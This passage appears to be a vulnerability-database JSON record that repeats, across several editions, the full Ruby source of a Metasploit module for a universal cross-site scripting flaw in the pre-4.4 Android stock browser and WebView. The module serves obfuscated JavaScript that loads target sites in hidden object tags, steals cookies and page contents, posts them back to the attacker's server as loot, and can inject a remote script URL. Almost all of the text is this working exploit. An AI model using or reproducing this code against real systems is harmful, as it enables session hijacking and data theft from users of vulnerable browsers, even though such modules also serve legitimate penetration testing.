'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-11T21:21:31", "differentElements": ["modified", "published"], "edition": 50}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-11T23:22:50", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-11T23:22:50", "differentElements": ["modified", "published"], "edition": 51}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-12T21:32:09", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-12T21:32:09", "differentElements": ["modified", "published"], "edition": 52}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-12T23:21:19", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-12T23:21:19", "differentElements": ["modified", "published"], "edition": 53}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-16T15:20:06", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-16T15:20:06", "differentElements": ["modified", "published"], "edition": 54}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-16T17:18:53", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-16T17:18:53", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T13:25:44", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
